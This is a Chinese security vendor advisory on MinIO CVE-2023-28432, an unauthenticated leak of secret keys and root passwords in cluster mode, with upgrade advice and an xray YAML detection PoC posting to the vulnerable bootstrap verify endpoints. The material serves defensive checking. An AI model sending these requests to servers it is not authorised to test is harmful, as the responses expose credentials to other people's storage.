长亭百川云 - 文章详情

【应急排查】MinIO 敏感信息泄露漏洞(CVE-2023-28432)

ykc

77

2023-03-24

漏洞介绍

事件来源

MinIO 提供高性能、与S3 兼容的对象存储系统,让用户自己能够构建自己的云储存服务。MinIO原生支持 Kubernetes,它可用于每个独立的公共云、每个 Kubernetes 发行版、私有云和边缘的对象存储套件。

3月20日,MinIO 官方发布了安全补丁,修复了一处敏感信息泄露漏洞 CVE-2023-28432:https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q

漏洞描述

在集群模式的配置下,MinIO 部分接口由于信息处理不当返回了所有的环境变量信息(包括 MINIO_SECRET_KEY 和 MINIO_ROOT_PASSWORD),从而导致敏感信息泄漏漏洞,攻击者可能通过获取到的密钥配置信息直接登陆操作 MinIO 接口。

只有 MinIO 被配置为集群模式时才会受此漏洞影响,此漏洞的利用无需用户身份认证,官方建议所有使用集群模式配置的用户尽快升级。

影响版本

MinIO RELEASE.2019-12-17T23-16-33Z <= MinIO Version < MinIO RELEASE.2023-03-20T20-16-18Z

解决方案

MinIO 官方已发布相应的补丁修复漏洞,用户可通过升级到 RELEASE.2023-03-20T20-16-18Z 版本进行漏洞修复。

产品支持

云图:默认支持该产品的指纹识别,同时支持该漏洞的PoC原理检测。

洞鉴:支持以自定义POC的形式进行检测。

雷池:已发布自定义规则支持该漏洞利用行为的检测。

牧云(主机安全):默认支持该产品的资产采集,同时支持该漏洞的检测。

牧云(容器安全):默认支持该产品的资产采集,同时支持该漏洞的检测。

全悉:已发布更新包支持该漏洞利用行为的检测。

漏洞排查方案

长亭科技为安全社区提供了多款免费社区安全工具,详情可查看 长亭科技安全社区 CTStack

该漏洞可以使用

  • 基于长亭洞鉴远程评估系统提炼的免费社区工具 XRay

  • 基于长亭牧云主机/容器安全产品提炼的免费社区工具 VeinMind

远程排查

  1. 下载最新版本 xray 工具

  2. 新建文件,填写如下 PoC 内容,命名为:poc-yaml-minio-cve-2023-28432.yaml

1name: poc-yaml-minio-cve-2023-28432
2manual: true
3transport: http
4rules:
5    poc01:
6        request:
7            cache: true
8            method: POST
9            path: /minio/bootstrap/v1/verify
10            headers:
11                Content-Type: application/x-www-form-urlencoded
12            follow_redirects: false
13        expression: response.status == 200 && response.body.bcontains(b"MinioEndpoints")
14    poc02:
15        request:
16            cache: true
17            method: POST
18            path: /bootstrap/v1/verify
19            headers:
20                Content-Type: application/x-www-form-urlencoded
21            follow_redirects: false
22        expression: response.status == 200 && response.body.bcontains(b"MinioEndpoints")
23expression: poc01() || poc02()
24detail:
25    author: chaitin
26    links:
27        - https://docs.min.io/cn/
28    vulnerability:
29        level: high
  1. 如果要扫描单个目标,以 windows 平台为例,执行如下内容:

    .\xray_windows_amd64.exe ws -p .\poc-yaml-minio-cve-2023-28432.yaml -u http://www.example.com

其中 -p 参数用于指定PoC文件的路径,-u 参数用于指定扫描目标。

观察到有如下输出,则漏洞存在:

!

  1. 如果要批量扫描多个目标,以 windows 平台为例:

新建target.txt,填入需要进行扫描的URL,以换行符分隔,如:

http://1.example.com
http://2.example.com

执行如下命令:

.\xray_windows_amd64.exe ws -p .\poc-yaml-minio-cve-2023-28432.yaml -uf ./target.txt

其中 -uf 参数用于指定扫描目标文件。输出结果同上。

  1. 建议使用 --json-output [文件名]  或 --html-output [文件名] 参数,将扫描结果保存到本地,便于查看分析,例如:

    .\xray_windows_amd64.exe ws -p .\poc-yaml-minio-cve-2023-28432.yaml -u http://www.example.com --html-output result.html

如果扫描结果存在漏洞,则可在指定位置生成报告,样例如下:

  1. 详细的xray使用手册可参考xray 安全评估工具文档

本地排查

  1. 下载问脉 MinIO 专项漏洞扫描工具

  2. 执行扫描命令

扫描本地镜像:

./veinmind-minio scan image

扫描本地容器:

./veinmind-minio scan container

3. 看到如下结果,说明发现漏洞存在

参考资料

https://mp.weixin.qq.com/s/JgskenAZ6Cpecoe2k2AEjQ

https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z

https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2